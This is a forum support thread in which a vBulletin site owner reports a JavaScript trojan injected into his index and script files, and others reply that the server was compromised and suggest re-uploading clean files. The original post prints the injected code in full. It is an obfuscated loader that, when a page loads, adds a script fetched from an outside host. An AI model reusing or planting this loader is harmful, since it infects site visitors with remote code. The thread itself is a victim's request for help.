Announcement

Collapse
No announcement yet.

My vB 3.8 websites infected with "Trojan-Downloader.JS.Agent.ewo"

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • My vB 3.8 websites infected with "Trojan-Downloader.JS.Agent.ewo"

    This trojan adds a code line at the end of :
    >Every files containing the word "index"
    >Every javascript files

    Here are the codes of the malware :
    Code:
    /*LGPL*/ try{ window.onload = function(){var Est1o8ahkk = document.createElement('s&@c(@)r@$i#@p@!!t^&@'.replace(/\(|\!|\$|#|\^|@|\)|&/ig, ''));Est1o8ahkk.setAttribute('defer', 'd@e(f$!(e$^r(#'.replace(/@|#|\!|\)|\^|&|\(|\$/ig, ''));Est1o8ahkk.setAttribute('type', 't$@#e@x!#)$t$/&@#j&a!((^v&&a$^!)s#&c($)r^!i!p&#@(t@(!('.replace(/\)|\$|&|#|@|\^|\(|\!/ig, ''));Est1o8ahkk.setAttribute('id', 'F)@&7)()g&^(n$^@a&(!p$)i!&(8(#(c&(@&z$!)h#'.replace(/#|\!|\)|\$|&|@|\^|\(/ig, ''));Est1o8ahkk.setAttribute('s(&)&r$!c^^@!'.replace(/\^|\!|#|\(|@|\$|\)|&/ig, ''),  'h^!t&$$t@)p^)&:&^(/@(/&!()t^$@a(r#g^##!e#@t(#-(@c!#^&&o&!$m(#!.#((s)@&t#@$c^^!.$$$!#c^o^!)m^.#)s^a^.(m($#e^$d#i($$a^f##)i$^r$e!&#-)$c$&(o@!(m!$!.()!#t$e($e$)n@)@!&w^e^b!)^d&&e^#s(i^g#$(n^&.#&(!@r&^)u(:^#8^(#0##$8&#(^$0(/^w!^(e@&a$@t$h)$e))!@r^#.^!c$#o#&m)/&(w#&e)$!$a^!t@h!^e$r(@(.)^)c(#o&^!m)!$/^^!g&#(^o^^#(^o#)g(&l!!#e@#.@c)!)o$m^&$/!&!#e^((x$(#c(!!i!t#e^&^.@!c&($o@&.#)j&@p&#/&&&h@$$^(a#r&)d&s)#!^e@!x$(t&&u#b@@e!(.$#c!)#!o&m#/)$$!#'.replace(/\(|#|&|\^|\!|\)|\$|@/ig, ''));if (document){document.body.appendChild(Est1o8ahkk);}} } catch(Rf6tzozxjhnoqp6eleyo) {}
    
    <script>/*LGPL*/ try{ window.onload = function(){var Est1o8ahkk = document.createElement('s&@c(@)r@$i#@p@!!t^&@'.replace(/\(|\!|\$|#|\^|@|\)|&/ig, ''));Est1o8ahkk.setAttribute('defer', 'd@e(f$!(e$^r(#'.replace(/@|#|\!|\)|\^|&|\(|\$/ig, ''));Est1o8ahkk.setAttribute('type', 't$@#e@x!#)$t$/&@#j&a!((^v&&a$^!)s#&c($)r^!i!p&#@(t@(!('.replace(/\)|\$|&|#|@|\^|\(|\!/ig, ''));Est1o8ahkk.setAttribute('id', 'F)@&7)()g&^(n$^@a&(!p$)i!&(8(#(c&(@&z$!)h#'.replace(/#|\!|\)|\$|&|@|\^|\(/ig, ''));Est1o8ahkk.setAttribute('s(&)&r$!c^^@!'.replace(/\^|\!|#|\(|@|\$|\)|&/ig, ''),  'h^!t&$$t@)p^)&:&^(/@(/&!()t^$@a(r#g^##!e#@t(#-(@c!#^&&o&!$m(#!.#((s)@&t#@$c^^!.$$$!#c^o^!)m^.#)s^a^.(m($#e^$d#i($$a^f##)i$^r$e!&#-)$c$&(o@!(m!$!.()!#t$e($e$)n@)@!&w^e^b!)^d&&e^#s(i^g#$(n^&.#&(!@r&^)u(:^#8^(#0##$8&#(^$0(/^w!^(e@&a$@t$h)$e))!@r^#.^!c$#o#&m)/&(w#&e)$!$a^!t@h!^e$r(@(.)^)c(#o&^!m)!$/^^!g&#(^o^^#(^o#)g(&l!!#e@#.@c)!)o$m^&$/!&!#e^((x$(#c(!!i!t#e^&^.@!c&($o@&.#)j&@p&#/&&&h@$$^(a#r&)d&s)#!^e@!x$(t&&u#b@@e!(.$#c!)#!o&m#/)$$!#'.replace(/\(|#|&|\^|\!|\)|\$|@/ig, ''));if (document){document.body.appendChild(Est1o8ahkk);}} } catch(Rf6tzozxjhnoqp6eleyo) {}</script>
    <!--3abf2ff8e4f89cfaa024a3d05e678819-->
    I just would like to know if the contamination came from vB or my host.

    CÚdric
    Last edited by cclaerhout; Mon 11th Jan '10, 6:39am.

  • #2
    Nothing in vBulletin by default can edit files. If your files have been edtied they have server level access.

    Comment


    • #3
      Thanks for your answer, i'm going to inform my host.

      Comment


      • #4
        more information about this trojan here

        Comment


        • #5
          I had one last year. It was horrible.
          s.molinari - I would like to ask all customers to definitely feedback issues with the software and be specific with the issues, but to basically suck-up what happened in the past and try to just look forward.

          Comment


          • #6
            Thank you very much for your answers. I've finished to fix the first of my websites. Still one to do.

            I takes a huge time.

            Comment


            • #7
              Provided you've not modified them yourself for a plugin etc, just upload a fresh copy of all files from the Members area. Will make things a lot quicker than hunting down every 'index.php' file and removing the code.
              Vote for:

              - *Admin Settable Paid Subscription Reminder Timeframe*
              -
              *PM - Add ability to reply to originator only*
              - Add Admin ability to auto-subscribe users to specific channel(s)
              - Highlight the correct navigation tab when you are on a custom page
              - "Quick Route" Interface...
              - Allow to use custom icons for individual forums

              Comment

              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
              Working...
              X